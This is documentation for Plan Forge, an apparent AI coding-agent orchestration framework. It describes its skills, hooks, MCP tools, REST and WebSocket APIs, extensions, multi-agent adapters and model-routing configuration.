- REST: POST /api/tool/forge_run_skill through the generic dispatcher (see Appendix W). Used by the dashboard and any external integration.
The orchestrator can also defer a skill into the decision tray when it wants a human to choose; clients query GET /api/skills/pending and resolve through POST /api/skills/{accept,reject,defer} (full surface in Appendix W: Skills).
Six skills ship under presets/shared/skills/ and install regardless of language. These are the cross-cutting workflows.
| Skill | Invocation | What it does | Key tools |
|---|---|---|---|
| audit-loop | /audit-loop [--max=N --env=dev] | Recursive scan → triage → fix until findings converge to zero. The orchestrator's drain loop, exposed as a one-shot. | forge_tempering_*, forge_bug_register, forge_triage_route |
| forge-execute | /forge-execute | Guided plan execution: list plans → estimate cost → execute → report. The friendly path for new users. | forge_run_plan, forge_estimate_quorum, forge_cost_report |
| forge-quench | /forge-quench <plan> | Final hardening pass before committing a plan, runs validators and the completeness sweep. | forge_validate, forge_sweep |
| forge-troubleshoot | /forge-troubleshoot | Diagnose common Plan Forge issues: missing API keys, stale orchestrator logs, broken hub, hook conflicts. | forge_smith, forge_diagnose |
| health-check | /health-check | Forge diagnostic chain: forge_smith → forge_validate → forge_sweep. Run on a clean checkout before opening a PR. | forge_smith, forge_validate, forge_sweep |
| security-audit (shared variant) | /security-audit | Generic OWASP scan, secrets detection, severity report. Stack presets override with language-specific scanners. | forge_secret_scan, forge_dep_watch |
Ten skills ship per language preset under presets/<stack>/.github/skills/. Skill names are the same across stacks, but each implementation calls the language's idiomatic toolchain: database-migration uses Knex / Prisma for TypeScript, EF Core for .NET, Alembic for Python, GORM for Go, and so on.
| Skill | Invocation | What it does |
|---|---|---|
| api-doc-gen | /api-doc-gen | Generate or update OpenAPI spec, validate spec-to-code consistency. |
| code-review | /code-review | Comprehensive review: architecture, security, testing, patterns. |
| database-migration | /database-migration "<change>" | Generate, review, test locally, deploy to staging, with rollback. Five-step DAG with conditional early-exit on migration failure. |
| dependency-audit | /dependency-audit | Scan for vulnerabilities, outdated packages, license issues. Wraps npm audit / dotnet list package --vulnerable / pip-audit per stack. |
| forge-quench (stack variant) | /forge-quench | Same shape as shared variant, but invokes the stack's linter and test runner. |
| onboarding | /onboarding | Walk a new developer through project setup, architecture, and first task. |
| release-notes | /release-notes "<tag>" | Generate release notes from git history and CHANGELOG. Output formatted for GitHub Release, Slack, or email. |
| security-audit (stack variant) | /security-audit | Language-specific OWASP scan plus shared scanners. Wraps semgrep / bandit / brakeman / govulncheck per stack. |
| staging-deploy | /staging-deploy | Build, push, migrate, deploy, and verify on staging with health-check probe. |
| test-sweep | /test-sweep [category] | Run all test suites (unit, integration, API, E2E) and aggregate results into a summary report. Run before the Review Gate. |
The minimum viable skill is one frontmatter block + one numbered step. Drop it under .github/skills/<name>/SKILL.md and it's available as /<name> in the next chat session. Example:
---
name: deploy-canary
description: "Deploy current branch to canary environment and watch metrics for 10 minutes. USE FOR: gradual rollout. DO NOT USE FOR: hotfixes (use /staging-deploy)."
argument-hint: "[optional: minutes to watch, default 10]"
tools: [run_in_terminal, read_file]
---
# Deploy Canary Skill
## Steps
### 1. Build & Push
```bash
docker build -t myregistry/myapp:canary .
docker push myregistry/myapp:canary
```
### 2. Apply
```bash
kubectl set image deployment/myapp myapp=myregistry/myapp:canary -n canary
kubectl rollout status deployment/myapp -n canary --timeout=2m
```
### Conditional: Rollout Failure
> If rollout fails → immediately `kubectl rollout undo`, report the error, and STOP. Do not proceed to watch.
### 3. Watch
```bash
sleep $(( ${MINUTES:-10} * 60 ))
kubectl logs -l app=myapp -n canary --tail=200
```
## Safety Rules
- NEVER deploy from a dirty working tree
- ALWAYS rollback within 60s if 5xx rate exceeds 1%
Authoring guidance:
- Keep steps idempotent: use IF NOT EXISTS, check-then-act patterns, and explicit cleanup steps.
- Record cross-run lessons under ## Persistent Memory. The capture is routed to L2 and, if configured, L3 OpenBrain.
- Every skill under presets/<stack>/.github/skills/ is a worked example. The richest are database-migration (5-step DAG with conditional rollback) and audit-loop (recursive convergence loop).
Hooks run automatically during agent sessions, no manual activation:
| Hook | When | What It Enforces |
|---|---|---|
| SessionStart | Session begins | Injects Project Principles, current phase, forbidden patterns |
| PreToolUse | Before file edit | Blocks edits to paths listed in plan's Forbidden Actions |
| PostToolUse | After file edit | Auto-formats, warns on TODO/FIXME/stub markers |
| Stop | Session ends | Warns if code modified but no test run detected |
📄 Full reference: capabilities, Multi-Agent Setup — GitHub Copilot
102 MCP tools across 8 categories, Core, LiveGuard, Watcher, Crucible, Tempering, Bug Registry, Testbed, Forge-Master, plus REST API, WebSocket hub, telemetry, and cost tracking. The integration layer.
A single Node.js process runs three subsystems, the nervous system that lets all your tools talk to each other:
- MCP server: 102 MCP tools across 8 categories (Core, LiveGuard, Watcher, Crucible, Tempering, Bug Registry, Testbed, Forge-Master) exposed via Model Context Protocol. Copilot, Claude, and Cursor call these as function calls.
- HTTP server (port 3100): Dashboard UI, REST API, static files. ~100 endpoints for programmatic access.
- WebSocket hub (port 3101): Real-time events. The dashboard subscribes for live slice progress.
This chapter is split across three pages for clarity:
Starting the server, VS Code auto-start, and the essential tools every Forge user needs: forge_capabilities, forge_run_plan, forge_plan_status, forge_smith, and more.
Complete tool tables for all 8 categories (102 tools), REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.
Call forge_capabilities before anything else: it returns the full live API surface including tool schemas, config options, available extensions, and per-tool error codes. Always authoritative.
📄 Full reference: capabilities, EVENTS.md on GitHub, tools.json on GitHub
Start the server, verify it's running, and call your first forge tools in under five minutes.
# Install dependencies (first time only)
cd pforge-mcp && npm install && cd ..
# Full server: MCP + HTTP + WebSocket
node pforge-mcp/server.mjs
# Dashboard only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only
# Custom project path
node pforge-mcp/server.mjs --project /path/to/project
With .vscode/mcp.json configured (created by setup.ps1 / setup.sh), the server auto-starts when Copilot calls any forge tool; you don't need to start it manually.
# Check the health endpoint
curl http://localhost:3100/api/status
# Or open the dashboard in your browser
open http://localhost:3100
These are the tools you'll use most often. Start with forge_capabilities to discover the full surface; use forge_run_plan to execute your work.
Call forge_capabilities at the start of a session: it returns the live API surface including tool schemas, config options, extensions, and per-tool error codes.
Returns the complete, always-authoritative API surface. Call this first.
forge_capabilities({})
Returns: tool schemas, intents, config keys, available extensions, per-tool error codes.
Diagnose your setup: VS Code config, Node version, MCP connectivity, preset health, version currency. Run this when something isn't working.
forge_smith({})
Execute a hardened plan file. Spawns workers, validates gates after each slice, tracks tokens and cost. This is the core execution command.
// Estimate cost before running (recommended)
forge_run_plan({ plan: "docs/plans/Phase-1.md", estimate: true })
// Execute
forge_run_plan({ plan: "docs/plans/Phase-1.md" })
// Execute with quorum mode
forge_run_plan({ plan: "docs/plans/Phase-1.md", quorum: "auto" })
// Resume from a specific slice
forge_run_plan({ plan: "docs/plans/Phase-1.md", resumeFrom: 3 })
Quorum modes: auto (adaptive), power (flagship models, threshold 5), speed (fast models, threshold 7), false (single model, no quorum).
Poll the status of the currently running (or most recent) plan execution. Returns per-slice results, tokens consumed, duration, and gate outcomes.
forge_plan_status({})
Abort the currently running plan execution. The orchestrator finishes the current slice's work-in-progress before stopping.
forge_abort({})
Multi-model bug investigation: provide a source file (and optionally models) and receive root-cause analysis plus fix recommendations.
forge_diagnose({ file: "src/services/billing.ts" })
Cross-artifact consistency scoring (0–100 across 4 dimensions). Checks that your plans, code, tests, and docs are in sync. Run before shipping. plan is required and can point at a plan markdown or a source file.
forge_analyze({ plan: "docs/plans/Phase-1-AUTH-PLAN.md" })
Project the cost of a plan under all four quorum modes before executing. Always call this instead of hand-computing costs.
forge_estimate_quorum({ planPath: "docs/plans/Phase-1.md" })
1. forge_capabilities({}) to see the live API surface
2. forge_smith({}) to confirm everything is green
3. forge_estimate_quorum({ planPath: "…" }) before any execution
4. forge_run_plan({ plan: "…" }) to execute your plan
5. forge_plan_status({}) to track progress
6. forge_analyze({ plan: "…" }) to confirm artifact consistency
📄 Full reference: capabilities, EVENTS.md on GitHub, tools.json on GitHub
Complete tool tables for all 102 MCP tools across 8 categories, REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.
Every tool is callable from Copilot Chat, Claude Code, Cursor, or any MCP-compatible client. Tools are grouped by station / subsystem. The four "station" categories (Crucible, LiveGuard, Tempering, Bug Registry / Testbed) map directly to the four shop stations; the rest are cross-cutting infrastructure.
Call forge_capabilities before anything else: it returns the full live API surface including tool schemas, config options, available extensions, and per-tool error codes. Always authoritative.
Everything that powers the Smelt and Forge stations plus the cross-cutting surfaces (skills, memory, cost, search, review queue, notifications, image generation, meta-bug filing).
| Tool | Description |
|---|---|
| Diagnostics & setup | |
| forge_smith | Diagnose environment, VS Code config, setup health, version currency. The "shop inspector." |
| forge_validate | Validate setup files, check counts match preset, no placeholders |
| forge_sweep | Scan for TODO/FIXME/HACK/stub/placeholder markers |
| forge_capabilities | Machine-readable API surface, tools, intents, config, extensions, error codes |
| forge_status | Show phases from DEPLOYMENT-ROADMAP.md with status |
| Plan execution (Forge station) | |
| forge_run_plan | Execute a hardened plan: spawn workers, validate gates, track tokens. Supports --quorum=auto\|power\|speed\|false |
| forge_abort | Abort the currently running plan execution |
| forge_plan_status | Latest execution status, per-slice results, tokens, duration |
| forge_diff | Compare changes against the plan's Scope Contract, detect drift |
| forge_new_phase | Create a new phase plan file + roadmap entry |
| Analysis & estimation | |
| forge_analyze | Cross-artifact consistency scoring (0–100, 4 dimensions) |
| forge_diagnose | Multi-model bug investigation, root cause + fix recommendations |
| forge_estimate_quorum | Projected cost of a plan under all four quorum modes (auto/power/speed/false). Always call this before showing cost estimates, never hand-compute. |
| forge_estimate_slice | Per-slice cost estimate with confidence (heuristic vs historical) |
| forge_doctor_quorum | Diagnose quorum-mode availability and routing issues |
| forge_graph_query | Query the Plan Forge knowledge graph (built post-Slice via postSlice hook) |
| forge_search | Cross-artifact search across plans, runs, bugs, memory |
| Cost & performance | |
| forge_cost_report | Cost tracking: total spend, per-model breakdown, monthly trend. Authoritative source for actual spend. |
| forge_timeline | Unified chronological view of runs, incidents, bugs, deploys, fm-turns, crucible events. 9 sources. |
| forge_home_snapshot | Snapshot of the “home” dashboard tile state, aggregate health surface |
| Skills & review | |
| forge_run_skill | Execute a skill programmatically with step-level tracking |
| forge_skill_status | Recent skill execution events from the hub |
| forge_review_add | Queue a review item (used by Step 5 reviewer agents) |
| forge_review_list | List open / resolved review items |
| forge_review_resolve | Resolve a review item with verdict + notes |
| forge_patterns_list | List captured architectural patterns for a project |
| Memory (Learn station bridge) | |
| forge_memory_capture | Normalise and broadcast a memory-captured hub event for OpenBrain |
| forge_memory_report | Aggregate report of recent captures, patterns, decisions |
| Notifications & bridge | |
| forge_notify_send | Send a notification via the configured Remote Bridge (Slack / Teams / PagerDuty / OpenClaw / Telegram / Discord) |
| forge_notify_test | Test the Remote Bridge configuration end-to-end |
| forge_delegate_to_agent | Hand a sub-task to a specific reviewer agent in multi-agent mode |
| Extensions & meta | |
| forge_ext_search | Search the community extension catalog |
| forge_ext_info | Detailed info about a specific extension |
| forge_org_rules | Export org custom instructions, consolidate instruction files for GitHub org-level Copilot config |
| forge_meta_bug_file | File a self-repair bug against Plan Forge itself (plan-defect / orchestrator-defect / prompt-defect) |
| forge_triage_route | Route a finding to the appropriate lane (bug / spec / classifier), powers the audit-loop drain |
| forge_generate_image | Generate images via Grok Aurora or DALL-E, save with format conversion |
The Guard station. Detect drift, capture incidents, watch dependencies, scan for secrets, propose fixes, all running against shipped code. Chapter 17 — LiveGuard Tools Reference covers each one in depth (flags, thresholds, output shapes, severity matrix). Listed here for completeness.
| Tool | Description |
|---|---|
| forge_liveguard_run | Composite scan: drift + sweep + secrets + regression + deps + alerts + health. The "everything" command. |
| forge_drift_report | Score codebase against architecture guardrail rules; track drift over time |
| forge_secret_scan | High-entropy secret detection, values always redacted |
| forge_dep_watch | Scan dependencies for CVEs; alert on new vulnerabilities |
| forge_regression_guard | Extract validation gates from plans, execute against codebase |
| forge_incident_capture | Record incidents with severity, affected files, MTTR tracking |
| forge_alert_triage | Read incidents and drift violations, rank by priority |
| forge_env_diff | Environment variable key divergence across .env files |
| forge_fix_proposal | Generate scoped 1–2 slice fix plan from a regression / drift / incident finding |
| forge_health_trend | Aggregate drift, cost, incidents, model performance into health score 0–100 |
| forge_hotspot | Identify git-churn hotspots, files that change most frequently |
| forge_runbook | Generate an operational runbook from a hardened plan file |
| forge_deploy_journal | Record deployments with version, deployer, notes |
| forge_quorum_analyze | Assemble structured quorum prompt from LiveGuard data, no LLM calls |
Read-only observation of another project's forge run from a second VS Code session. See Chapter 19 — The Watcher.
| Tool | Description |
|---|---|
| forge_watch | Snapshot or analyze (claude-opus-4.7) mode. Returns counts, anomalies, recommendations, diff cursor. |
| forge_watch_live | Live tail: streams events for a fixed duration via target's WebSocket hub or events.log polling. |
The Smelt station. Interview-driven plan intake with a critical-fields gate that refuses to finalize until build-command, test-command, scope, gates, and forbidden-actions are all satisfied. Includes a deterministic Spec Kit importer. See Chapter 5 — Crucible.
| Tool | Description |
|---|---|
| forge_crucible_submit | Submit a raw idea or feature request to start an interview |
| forge_crucible_ask | Answer the next interview question. Supports an optional questionId to refuse on out-of-sync clients with ASK_QUESTION_MISMATCH. |
| forge_crucible_preview | Preview the draft plan + flag any unresolved CRITICAL_FIELDS |
| forge_crucible_finalize | Finalize into docs/plans/Phase-NN.md. Refuses if plan exists with PLAN_ALREADY_EXISTS; pass overwrite: true to bypass. Refuses on missing CRITICAL_FIELDS with CRITICAL_FIELDS_MISSING. |
| forge_crucible_list | List all in-flight and finalized smelts |
| forge_crucible_abandon | Abandon an in-flight smelt |
| forge_crucible_import | Deterministic Spec Kit importer. Maps a Spec Kit checkout (spec.md + plan.md + tasks.md + optional constitution.md) into a Plan Forge smelt under .forge/crucible/. No LLM calls. Supports --dry-run and --json. |
| forge_crucible_status | Inspect imported smelts. Lists all smelts when called without an id, or returns the full smelt record (metadata + draft plan) when given a smelt id. |
Closed-loop self-tempering, scan, triage, fix, repeat until convergence. The audit-loop drain is opt-in via .forge.json → audit.mode = "off" | "auto" | "always". See Audit Loop Deep Dive.
| Tool | Description |
|---|---|
| forge_tempering_scan | Run a single tempering scanner (mutation, content-audit, etc.) |
| forge_tempering_run | Run the full standard scanner sequence (10 scanners) |
| forge_tempering_drain | Iterate scan → triage → fix until convergence or maxRounds |
| forge_tempering_status | Latest tempering run status, scanners, findings |
| forge_tempering_approve_baseline | Approve current findings as the new baseline for visual-diff scanners |
The Learn station. Fingerprint-deduped bug registry: register, fix, validate, remember. See Chapter 23 — The Bug Registry.
| Tool | Description |
|---|---|
| forge_bug_register | Register a new bug with title, severity, fingerprint inputs, file paths |
| forge_bug_list | List bugs by status, severity, or fingerprint match |
| forge_bug_update_status | Update status (open / in-progress / fixed / verified / closed). Accepts both newStatus and status. |
| forge_bug_validate_fix | Run the bug's validation gate against the current codebase to confirm a fix landed |
Replay scenarios against a dedicated fixture repo (typically plan-forge-testbed/) to prove fixes don't regress. See Chapter 24 — The Testbed.
| Tool | Description |
|---|---|
| forge_testbed_run | Execute a scenario against the testbed fixture |
| forge_testbed_happypath | Run the happy-path scenario set as a smoke test |
| forge_testbed_findings | Aggregate findings from the latest testbed run |
Intent classifier with embedding cache and quorum advisory mode. Classifies open-ended prompts, fetches OpenBrain memory, and chains read-only forge tools on your behalf. The bulk of the Forge-Master surface is exposed via /api/forge-master/* REST routes (see below) plus the dashboard's Studio tab; only the one-shot reasoning entry-point is an MCP tool.
| Tool | Description |
|---|---|
| forge_master_ask | One-shot reasoning entry point. Accepts a free-form message; returns lane classification, tool-call trace, and synthesized reply. Use for open-ended questions instead of chaining tools yourself. |
/api/forge-master/cache-stats liveliness endpoint.
The REST surface is documented in full in Appendix W: REST API Reference, which covers every endpoint, request/response shape, status codes, authentication model, and worked examples. The summary below points at the most-used subsystems; click through to Appendix W for the per-endpoint detail.
| Subsystem | What it covers |
|---|---|
| Discovery | Liveness, version, capability manifest, well-known endpoint. |
| Plan execution & runs | Trigger/abort runs, traces, replay, plans, workers. |
| Search, timeline, hub | Cross-surface search, unified timeline, WebSocket upgrade. |
| Memory | Capture, drain, search, OpenBrain stats. |
| Crucible | Idea-smelt lifecycle: submit → ask → preview → finalize. |
| LiveGuard | Drift, incidents, deploy journal, regression guard, runbooks, secret scan, dep watch. |
| Bridge & approvals | The only cross-boundary auth surface (HMAC via PFORGE_BRIDGE_SECRET). |
| Forge-Master | Conversational entrypoint, chat, prefs, cache stats. |
| Generic MCP dispatcher | POST /api/tool/:name, invoke any of the 102 MCP tools over REST. |
The REST server binds to 127.0.0.1 only and has no authentication layer of its own; the OS user account is the access boundary. The only exception is the bridge approval surface, which is HMAC-protected. See Appendix W: Authentication, binding, and CORS for the full discussion.
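As an illustration of the generic dispatcher route, the sketch below only builds the request; it does not send it. The helper name buildToolRequest is hypothetical, and sending the tool arguments as the raw JSON body is an assumption: Appendix W is the authority on the actual request shape.

```javascript
// Sketch only: buildToolRequest is hypothetical, and the JSON body shape is an assumption.
function buildToolRequest(toolName, args, baseUrl = 'http://localhost:3100') {
  return {
    url: `${baseUrl}/api/tool/${encodeURIComponent(toolName)}`,
    init: {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(args ?? {}),
    },
  };
}

const statusRequest = buildToolRequest('forge_plan_status', {});
console.log(statusRequest.url);
// With the server running locally, the request could then be sent with:
//   const response = await fetch(statusRequest.url, statusRequest.init);
```

Because the server listens on 127.0.0.1 only, a call like this works from the same machine and nowhere else.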
Connect to ws://localhost:3101 for real-time events. The dashboard uses this for live progress updates.
| Event | When |
|---|---|
| connected | Client connects, includes event history replay |
| run-started | Plan execution begins |
| slice-started | Slice begins execution |
| slice-completed | Slice passes all validation gates |
| slice-failed | Slice or gate fails |
| slice-escalated | Slice escalated to quorum for multi-model consensus |
| run-completed | All slices finish |
| run-aborted | Execution aborted via forge_abort |
| skill-started | Skill execution begins |
| skill-completed | Skill finishes all steps |
| approval-requested | Bridge pauses for external approval |
| bridge-notification-sent | Webhook dispatched (Telegram, Slack, Discord) |
| watch-snapshot-completed | Watcher built a snapshot of a target project |
| watch-anomaly-detected | Watcher detected one or more anomalies (stalled, slice-failed, quorum-dissent, etc.) |
| watch-advice-generated | Watcher analyze-mode produced narrative advice from frontier model |
| fm-turn | Forge-Master turn (intent classification + tool-call trace + reply). Surfaces in the unified Timeline. |
| quorum-estimate | Forge-Master quorum advisory cost estimate, emitted before model dispatch so clients can cancel |
| memory-captured | Decision / pattern / postmortem captured to OpenBrain |
| crucible-started / crucible-question / crucible-finalized | Crucible interview lifecycle events |
| tempering-round-completed | One round of audit-loop drain finished (scan → triage → fix) |
| slice-orphan-warning | Failed slice's worker deliverables were staged but not committed; recovery commands available |
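A client usually wants a running summary rather than raw frames. The sketch below folds the run and slice events from the table into a small progress object. It assumes each frame is a JSON object whose event name sits in a `type` field; that field name, `reduceRunProgress`, and `initialProgress` are hypothetical, so check Appendix V for the real payload shape before relying on it.

```javascript
// Hypothetical message shape: { "type": "<event name>", ... }.
// Event names come from the table above; the `type` field is an assumption.
const initialProgress = { started: 0, completed: 0, failed: 0, status: "idle" };

function reduceRunProgress(state, rawMessage) {
  let event;
  try {
    event = JSON.parse(rawMessage);
  } catch {
    return state; // ignore frames that are not JSON
  }
  if (!event || typeof event !== "object") return state;

  switch (event.type) {
    case "run-started":
      return { started: 0, completed: 0, failed: 0, status: "running" };
    case "slice-started":
      return { ...state, started: state.started + 1 };
    case "slice-completed":
      return { ...state, completed: state.completed + 1 };
    case "slice-failed":
      return { ...state, failed: state.failed + 1 };
    case "run-completed":
      return { ...state, status: "completed" };
    case "run-aborted":
      return { ...state, status: "aborted" };
    default:
      return state; // events this sketch does not track
  }
}
```

In a runtime that provides a WebSocket global, the reducer could be fed from the `onmessage` handler of a socket opened against ws://localhost:3101, replacing the stored state on every frame.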
Every plan execution emits OpenTelemetry (OTLP) traces stored in .forge/runs/<timestamp>/traces.json:
The orchestrator tracks tokens and computes cost per slice using a 23-model pricing table:
.forge/cost-history.json
.forge/model-performance.json tracks success rate, average cost, and average duration per model
The orchestrator auto-selects the cheapest model with >80% historical pass rate. Use --estimate to preview costs before executing.
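The selection rule (cheapest model whose historical pass rate exceeds 80%) can be sketched in a few lines. The record shape below (`model`, `successRate`, `avgCostUSD`) and the function name are assumptions made for illustration; the actual layout of .forge/model-performance.json may differ.

```javascript
// Assumed record shape: { model: string, successRate: 0..1, avgCostUSD: number }.
// This is an illustrative sketch, not the orchestrator's selection code.
function pickCheapestReliableModel(records, minPassRate = 0.8) {
  // Keep only models strictly above the pass-rate bar (">80%").
  const eligible = records.filter((r) => r.successRate > minPassRate);
  if (eligible.length === 0) return null;
  // Among those, return the one with the lowest average cost.
  return eligible.reduce((best, r) => (r.avgCostUSD < best.avgCostUSD ? r : best)).model;
}
```

Returning `null` when nothing qualifies leaves the fallback decision (for example, using the configured default model) to the caller.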
The pforge-sdk/ package provides a JavaScript/TypeScript API for building integrations:
import { createForgeClient } from 'pforge-sdk';
const forge = createForgeClient({ baseUrl: 'http://localhost:3100' });
// Run smith diagnostics
const health = await forge.smith();
// Get cost report
const cost = await forge.costReport();
// Execute a plan
const run = await forge.runPlan('docs/plans/Phase-1.md', {
  mode: 'estimate'
});
The SDK is currently in scaffold stage (v0.1.0): the API surface is defined and implementation is in progress.
API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.
{
  "XAI_API_KEY": "xai-...",
  "OPENAI_API_KEY": "sk-..."
}
The .forge/ directory is gitignored by default, so secrets never enter version control.
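The resolution order (environment variable, then .forge/secrets.json, then null) is easy to mirror in integration code. In this sketch `resolveApiKey` is a hypothetical helper, and `secrets` stands in for the already-parsed contents of .forge/secrets.json; reading and parsing the file is left out.

```javascript
// Hypothetical helper mirroring the documented lookup order.
// `env` is an object such as process.env; `secrets` is the parsed secrets file or null.
function resolveApiKey(name, env, secrets) {
  if (env[name]) return env[name];                      // 1. environment variable
  if (secrets && secrets[name]) return secrets[name];   // 2. .forge/secrets.json
  return null;                                          // 3. nothing configured
}
```

A caller would typically treat `null` as "this provider is unavailable" rather than as an error.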
📄 Full reference: capabilities, Appendix V — Event Catalog (every WebSocket event grouped by family), EVENTS.md on GitHub, tools.json on GitHub
Install, create, and publish guardrail extensions.
Extensions are packaged bundles of instruction files, agents, and prompts that add domain-specific guardrails to your project. They give you drop-in expertise for domains you haven't solved yet: instead of writing compliance rules from scratch, install a community extension and get pre-built knowledge.
# Browse all extensions
pforge ext search
# Filter by keyword
pforge ext search compliance
# Get details about a specific extension
pforge ext info saas-multi-tenancy
The catalog is also browsable in the Dashboard Extensions tab.
| Extension | Category | What It Adds |
|---|---|---|
| saas-multi-tenancy | Architecture | Tenant isolation patterns, RLS enforcement, cache separation, cross-tenant audit |
| azure-infrastructure | Cloud | Bicep/Terraform guardrails, resource naming, tagging, cost governance |
| plan-forge-memory | Integration | OpenBrain memory, persistent context across sessions, postmortem injection |
# One-step install from catalog
pforge ext add saas-multi-tenancy
# Install from local path
pforge ext install .forge/extensions/my-extension
This copies instruction files to .github/instructions/, agents to .github/agents/, and prompts to .github/prompts/. The extension metadata is tracked in .forge/extensions/.
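The copy rule can be pictured as a lookup from an extension's top-level folder to its destination under .github/. The sketch below is illustrative only: `installTarget` is a hypothetical name, and returning `null` for files outside the three folders is an assumption about how unrelated files are treated.

```javascript
// Folder-to-destination mapping taken from the paragraph above.
const INSTALL_TARGETS = new Map([
  ["instructions", ".github/instructions"],
  ["agents", ".github/agents"],
  ["prompts", ".github/prompts"],
]);

// Hypothetical helper: maps a path inside the extension to where it would be copied.
function installTarget(relativePath) {
  const [folder, ...rest] = relativePath.split("/");
  const targetDir = INSTALL_TARGETS.get(folder);
  if (!targetDir || rest.length === 0) return null; // not one of the three copied folders
  return `${targetDir}/${rest.join("/")}`;
}
```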
.forge/extensions/my-extension/extension.json manifest:
{
  "name": "my-extension",
  "version": "1.0.0",
  "description": "Domain-specific guardrails for healthcare",
  "author": "your-name",
  "category": "compliance"
}
my-extension/
├── extension.json
├── instructions/
│ ├── hipaa-compliance.instructions.md
│ └── phi-handling.instructions.md
├── agents/
│ └── hipaa-reviewer.agent.md
└── prompts/
└── compliance-audit.prompt.md
pforge ext install .forge/extensions/my-extension
pforge ext publish .forge/extensions/my-extension
Publishing generates a catalog entry; it doesn't upload anything. You submit via pull request:
pforge ext publish .forge/extensions/my-extension
extensions/catalog.json
feat(catalog): add my-extension
pforge ext publish outputs both a Plan Forge catalog entry and a Spec Kit-compatible extensions.json entry in one command.
# List installed extensions
pforge ext list
# Remove an extension
pforge ext remove healthcare-compliance
📄 Full reference: Extensions guide, PUBLISHING.md on GitHub
One setup, all agents. Configure Plan Forge for 7 AI tools.
CLAUDE.md, .cursorrules, AGENTS.md) so the agent reads Plan Forge's guardrails automatically.
-Agent flag.
# Add all agent adapters at once
.\setup.ps1 -Preset dotnet -Agent all
# Or pick specific agents
.\setup.ps1 -Preset dotnet -Agent claude,cursor
Copilot files are always installed. The -Agent flag adds native files for other tools, each with all 16 guardrail files embedded, prompts as native skills/commands, and 19 reviewer agents as invocable procedures.
| Feature | Copilot | Claude | Cursor | Codex | Gemini | Windsurf | Generic |
|---|---|---|---|---|---|---|---|
| Auto-loading instructions | ✓ Native | ✓ Emulated | ✓ Emulated | ⚠ Manual | ✓ Emulated | ✓ Emulated | ✗ |
| Pipeline agents | ✓ 6 | ✓ Skills | ✓ Commands | ✓ Skills | ✓ Commands | ✓ Workflows | ✗ |
| Reviewer agents | ✓ 19 | ✓ 19 | ✓ 19 | ✓ 19 | ✓ 19 | ✓ 19 | ✗ |
| MCP tools | ✓ | ✓ | ✓ | ⚠ Partial | ⚠ Partial | ⚠ Partial | ✗ |
| Full Auto execution | ✓ | ✓ | ✓ | ✓ | ⚠ | ✓ | ✗ |
| Lifecycle hooks | ✓ | ✓ Emulated | ✗ | ✗ | ✗ | ✗ | ✗ |
| Memory bridge | ✓ OpenBrain | ✓ Native | ⚠ | ⚠ | ⚠ | ⚠ | ✗ |
Native integration. Instruction files auto-load via applyTo. Agents appear in the agent picker. Skills invoke via /slash-command. Hooks run automatically. This is the reference implementation; all other agents emulate this behavior.
Key file: .github/copilot-instructions.md
All guardrails embedded in a single CLAUDE.md file. Claude Code reads this automatically at project root. Includes 33+ skills as slash commands, full auto mode, and memory hooks.
Key file: CLAUDE.md
.\setup.ps1 -Preset dotnet -Agent claude
Rules written to .cursorrules and .cursor/rules/*.mdc. Cascade integration loads rules automatically based on file patterns.
Key files: .cursorrules, .cursor/rules/
Skills as executable scripts in .agents/skills/. Terminal-based execution with all pipeline steps available.
Key file: AGENTS.md
Guardrails embedded in GEMINI.md. Commands as .gemini/commands/*.toml files for /planforge-* invocations.
Key files: GEMINI.md, .gemini/commands/
Rules in .windsurfrules and .windsurf/rules/*.md with trigger frontmatter. Workflows mapped to Cascade integration.
Key files: .windsurfrules, .windsurf/rules/
A single AI-ASSISTANT.md file with copy-paste guardrails. Works with ChatGPT, Ollama, or any tool that accepts text prompts.
Key file: AI-ASSISTANT.md
GitHub's Copilot cloud agent uses the same copilot flag, so no separate adapter is needed. Add copilot-setup-steps.yml to provision the agent's environment:
cp templates/copilot-setup-steps.yml .github/copilot-setup-steps.yml
The cloud agent gets all guardrails, MCP tools, and pforge run-plan automatically.
Across all seven agents, one challenge remains: each tool starts each session with a blank slate. OpenBrain solves this by acting as a shared, persistent memory layer that every agent reads from and writes to, regardless of which tool authored the thought.
When Claude Code resolves an architectural ambiguity, that decision is captured as a thought. When you switch to Copilot the next morning, it retrieves that thought before writing a single line. When your team's Cursor instance encounters the same pattern, it inherits the same guardrails. The agents change; the institutional knowledge compounds.
pforge recall CLI to inject context at session start. The Generic adapter includes copy-paste recall snippets.
For a deep dive into the three-tier memory architecture (in-RAM hub → local JSONL → pgvector semantic index), see Unified Memory Across Agents in Chapter 24.
See also: One Framework, Seven AI Agents, a practical walkthrough of how a mixed-agent team operates on a shared Plan Forge project without knowledge silos.
If you use Spec Kit for specifications, Plan Forge picks up where your specs end. The setup wizard auto-detects existing Spec Kit files and imports them as context. Extensions marked speckit_compatible work in both frameworks.
📄 Full reference: AGENT-SETUP.md on GitHub
Model routing, quorum mode, cost optimization, CI integration, and resume strategies.
Assign different models per role in .forge.json:
Same principle as a human team: let the junior do the legwork and the senior do the final check. Costs less, catches more.
{
  "modelRouting": {
    "default": "grok-4",
    "execute": "claude-sonnet-4.6",
    "review": "claude-opus-4.6"
  }
}
Use a fast/cheap model for execution and a more capable model for review. The orchestrator routes each slice to the appropriate model based on its role.
Models are split into two routing classes that determine how the orchestrator reaches them:
| Class | Models | Routing |
|---|---|---|
| DIRECT_API_ONLY | grok-*, dall-e-* | HTTP API only. No CLI proxy exists. Requires XAI_API_KEY / OPENAI_API_KEY. |
| COPILOT_SERVABLE | gpt-*, chatgpt-* (incl. gpt-5.3-codex) | Prefers gh copilot CLI proxy when available (uses your Copilot subscription). Falls back to direct OpenAI API if OPENAI_API_KEY is set. |
| Everything else | Claude, Gemini, etc. | CLI-first via the matching agent CLI (claude, gemini, etc.) |
This split (Phase-34, fixes #103) means gpt-* models no longer drop from auto-quorum when OPENAI_API_KEY is unset but gh-copilot is installed. The old pattern conflated “requires direct API” with “routed via HTTP” and unfairly penalized Copilot users.
When a model fails a slice, the orchestrator automatically escalates to the next model in the chain:
{
  "escalationChain": ["grok-4", "claude-opus-4.6", "gpt-5.2-codex"]
}
Model A fails → Model B retries the same slice → Model C if B fails too. Emits slice-escalated WebSocket event at each step. No manual intervention required.
